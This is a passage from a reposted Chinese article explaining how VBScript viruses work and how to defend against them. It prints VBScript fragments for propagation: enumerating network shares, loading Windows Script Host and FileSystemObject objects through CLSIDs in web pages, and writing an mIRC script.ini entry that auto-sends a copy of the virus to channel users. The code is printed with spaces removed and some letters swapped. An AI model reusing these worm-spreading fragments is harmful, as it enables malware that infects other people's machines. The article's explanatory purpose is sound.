VBS脚本病毒原理分析与防范
作者 佚名
来源 ASP编程
浏览
发布时间 2013-07-09
| twork=WScript.CreateObject("WScript.Network")''创建一个网络对象 SetoPrinters=WshNetwork.EnumPrinterConnections''创建一个网络打印机连接列表 WScript.Echo"Networkprintermappings:" Fori=0tooPrinters.Count-1Step2''显示网络打印机连接情况 WScript.Echo"Port"&oPrinters.Item(i)&"="&oPrinters.Item(i+1) Next SetcolDrives=WSHNetwork.EnumNetworkDrives''创建一个网络共享连接列表 IfcolDrives.Count=0Then MsgBox"没有可列出的驱动器。",vbInformation+vbOkOnly,welcome_msg Else strMsg="当前网络驱动器连接:"&CRLF Fori=0TocolDrives.Count-1Step2 strMsg=strMsg&Chr(13)&Chr(10)&colDrives(i)&Chr(9)&colDrives(i+1) Next MsgBoxstrMsg,vbInformation+vbOkOnly,welcome_msg''显示当前网络驱动器连接 EndIf 上面是一个用来寻找当前打印机连接和网络共享连接并将它们显示出来的完整脚本程序。在知道了共享连接之后,我们就可以直接向目标驱动器读写文件了。 3)通过感染htm、asp、jsp、php等网页文件传播 如今,WWW服务已经变得非常普遍,病毒通过感染htm等文件,势必会导致所有访问过该网页的用户机器感染病毒。 病毒之所以能够在htm文件中发挥强大功能,采用了和绝大部分网页恶意代码相同的原理。基本上,它们采用了相同的代码,不过也可以采用其它代码,这段代码是病毒FSO,WSH等对象能够在网页中运行的关键。在注册表HKEY_CLASSES_ROOT\CLSID\下我们可以找到这么一个主键{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B},注册表中对它他的说明是“WindowsScriptHostShellObject”,同样,我们也可以找到{0D43FE01-F093-11CF-8940-00A0C9054228},注册表对它的说明是“FileSystemObject”,一般先要对COM进行初始化,在获取相应的组件对象之后,病毒便可正确地使用FSO、WSH两个对象,调用它们的强大功能。代码如下所示: SetApple0bject=document.applets("KJ_guest") Apple0bject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") Apple0bject.createInstance()''创建一个实例 SetWsShellApple0bject.Get0bject() Apple0bject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}") Apple0bject.createInstance()''创建一个实例 SetFSO=Apple0bject.Get0bject() 对于其他类型文件,这里不再一一分析。 4)通过IRC聊天通道传播 病毒通过IRC传播一般来说采用以下代码(以MIRC为例) Dimmirc setfso=CreateObject("Scripting.FileSystemObject") setmirc=fso.CreateTextFile("C:\mirc\script.ini")''创建文件script.ini fso.CopyFileWscript.ScriptFullName,"C:\mirc\attachment.vbs",True''将病毒文件备份到attachment.vbs mirc.WriteLine"[script]" mirc.WriteLine"n0=on1:join:*.*:{if($nick!=$me){halt}/dccsend$nickC:\mirc\attachment.vbs}" ''利用命令/ddcsend$nickattachment.vbs给通道中的其他用户传送病毒文件 mirc.Close 以上代码用来往Script.ini文件中写入一行代码,实际中还会写入很多其他代码。Script.ini中存放着用来控制IRC会话的命令,这个文件里面的命令是可以自动执行的。譬如,“歌虫”病毒TUNE.VBS就会修改c:\mirc\script.ini和c:\mirc\mirc.ini,使每当IRC用户使用被感染的通道时都会收到一份经由DDC发送的TUNE.VBS。同样,如果Pirch98已安装在目标计算机的c:\pirch98目录下,病毒就会修改c:\pirch98\events.ini和c:\pirch98\pirch98.ini,使每当IRC用户使用被感染的通道时都会收到一份经由DDC发送的TUNE.VBS。 另外病毒也可以通过现在广泛流行的KaZaA进行传播。病毒将病毒文件拷贝到KaZaA的默认共享目录中,这样,当其他用户访问这台机器时,就有可能下载该病毒文件并执行。这种传播方法可能 |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
关于VBS脚本病毒原理分析与防范的所有评论
